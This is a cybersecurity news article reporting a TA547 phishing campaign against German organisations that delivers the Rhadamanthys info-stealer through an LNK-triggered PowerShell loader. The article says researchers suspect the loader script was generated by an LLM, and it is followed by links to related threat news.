11 April 2024

TA547 threat actor targets German orgs with Rhadamanthys info-stealer


TA547 threat actor targets German orgs with Rhadamanthys info-stealer

The financially motivated cybercriminal threat group known as TA547 has launched a new phishing campaign targeting organizations across various industries in Germany, marking a shift from the gang’s previous modus operandi.

TA547 is a financially focused Initial Access Broker (IAB). Previously, the group mainly targeted organizations in Spain, Switzerland, Austria, and the United States.

Notable aspects of the observed campaign include the use of the Rhadamanthys information-stealing malware instead of TA547's usual payload, NetSupport RAT, and a novel attack vector - a PowerShell script suspected to have been generated by a Large Language Model (LLM) such as ChatGPT, Gemini, or CoPilot.

The emails deployed in this campaign contained a password-protected ZIP file with an LNK file. When executed, the LNK file triggered PowerShell to execute a remote script, avoiding the direct writing of malicious code onto the disk.

The PowerShell script used to load Rhadamanthys revealed distinct characteristics not commonly observed in typical threat actor or legitimate programmer code. Specifically, the script featured grammatically correct and hyper-specific comments above each component, indicative of LLM-generated content. This suggests either the direct utilization of LLM-enabled tools by TA547 or the adoption of pre-existing scripts generated by such tools.

“It is important to note, however, that while TA547 incorporated suspected LLM-generated content into the overall attack chain, it did not change the functionality or the efficacy of the malware or change the way security tools defended against it,” Proofpoint researchers noted in a blog post. “In this case, the potentially LLM-generated code was a script which assisted in delivering a malware payload but was not observed to alter the payload itself.”


Back to the list

Latest Posts

Threat actors abusing Foxit PDF Reader flaw to deploy multiple malware variants

Threat actors abusing Foxit PDF Reader flaw to deploy multiple malware variants

The flaw involves Foxit PDF Reader's handling of pop-up messages.
20 May 2024
China-linked APT group uses malware to spy on commercial shipping

China-linked APT group uses malware to spy on commercial shipping

Mustang Panda infiltrated the computer systems of cargo shipping companies in Norway, Greece, and the Netherlands.
20 May 2024
The Grandoreiro malware is back up and running after January disruption

The Grandoreiro malware is back up and running after January disruption

Grandoreiro now targets over 1,500 banks worldwide, spanning more than 60 countries across Central and South America, Africa, Europe, and the Indo-Pacific region.
20 May 2024